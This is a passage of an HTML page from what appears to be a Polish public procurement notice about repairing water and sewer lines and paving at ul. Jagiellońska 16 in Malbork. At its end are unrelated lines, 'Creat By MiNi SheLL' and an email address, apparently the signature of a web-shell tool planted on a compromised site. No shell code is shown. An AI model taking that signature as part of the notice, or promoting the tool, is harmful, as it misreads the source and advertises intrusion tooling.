- wykucie betonu i rozbiórka betonu
- roboty ziemne, wykopy, zasypanie z zagęszczeniem.
2)	Roboty montażowe:
- montaż rur PE 90,
- montaż przyłączy PE 75 i 32,
- montaż zasuw i hydrantów
- roboty odtworzeniowe, 
- stabilizacja gruntu w miejscach wykopu,
- naprawa nawierzchni betonowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.24.00-7, 45.11.00.00-1, 45.23.30.00-9, 45.23.32.22-1, 45.23.32.00-1.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont odcinka sieci wodociągowej i kanalizacyjnej wraz z przyłączami oraz remont nawierzchni asfaltowych 
i betonowych w kompleksie przy ul. Jagiellońskiej 16 przy budynkach 13, 17, 18 w Malborku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na  remoncie odcinka sieci wodociągowej i kanalizacyjnej wraz z przyłączami oraz remontem nawierzchni asfaltowych 
i betonowych w kompleksie przy ul. Jagiellońskiej 16 przy budynkach 13, 17, 18 w Malborku. 
Zakres wykonania usługi:
1)	Roboty ziemne i rozbiórkowe:
- wycięcie asfaltu,
- nacięcie betonu,
- wykucie betonu,
- roboty ziemne, wykopy, zasypanie z zagęszczeniem
2)	Roboty montażowe:
- montaż przyłączy PE 32,
- montaż rur PVC dn 160/200 wraz ze studzienkami dn 400-/315,
- montaż studni betonowej dn 1000 mm.
- roboty odtworzeniowe, 
- stabilizacja gruntu w miejscach wykopu,
- naprawa nawierzchni betonowej,
- uzupełnienie asfaltu o grubości i strukturze asfaltu istniejącego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.24.00-7, 45.11.00.00-1, 45.23.30.00-9, 45.23.32.22-1, 45.23.32.00-1.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com